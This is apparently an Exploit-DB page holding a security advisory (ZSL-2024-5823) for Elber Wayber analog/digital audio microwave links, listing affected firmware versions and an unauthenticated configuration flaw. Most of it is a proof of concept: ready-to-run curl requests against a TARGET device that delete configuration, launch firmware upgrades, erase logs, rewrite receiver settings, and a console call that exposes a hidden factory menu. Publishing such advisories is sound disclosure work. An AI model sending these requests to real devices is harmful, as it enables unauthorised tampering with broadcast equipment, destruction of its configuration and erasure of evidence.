76d99ff06e
7 changes to exploits/shellcodes/ghdb Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure HughesNet HT2000W Satellite Modem - Password Reset Aurba 501 - Authenticated RCE
71 lines
No EOL
2.7 KiB
Text
71 lines
No EOL
2.7 KiB
Text
Elber Wayber Analog/Digital Audio STL 4.00 Device Config
|
|
|
|
|
|
Vendor: Elber S.r.l.
|
|
Product web page: https://www.elber.it
|
|
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
|
|
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
|
|
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
|
|
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
|
|
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
|
|
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
|
|
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
|
|
|
|
Summary: Wayber II is the name of an analogue/digital microwave link
|
|
able to transport a Mono or a MPX stereo signal from studio to audio
|
|
transmitter. Compact and reliable, it features very high quality and
|
|
modern technology both in signal processing and microwave section leading
|
|
to outstanding performances.
|
|
|
|
Desc: The device suffers from an unauthenticated device configuration and
|
|
client-side hidden functionality disclosure.
|
|
|
|
Tested on: NBFM Controller
|
|
embOS/IP
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2024-5823
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
--
|
|
|
|
|
|
# Config fan
|
|
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
|
|
Configuration applied
|
|
|
|
# Delete config
|
|
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
|
|
File delete successfully
|
|
|
|
# Launch upgrade
|
|
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
|
|
Upgrade launched Successfully
|
|
|
|
# Log erase
|
|
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
|
|
Logs erased
|
|
|
|
# Until:
|
|
# =0 ALL
|
|
# =-2 Yesterday
|
|
# =-8 Last week
|
|
# =-15 Last two weeks
|
|
# =-22 Last three weeks
|
|
# =-31 Last month
|
|
|
|
# Set RX config
|
|
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
|
|
RX Config Applied Successfully
|
|
|
|
# Show factory window and FPGA upload (Console)
|
|
> cleber_show_factory_wnd()
|
|
|
|
# Etc. |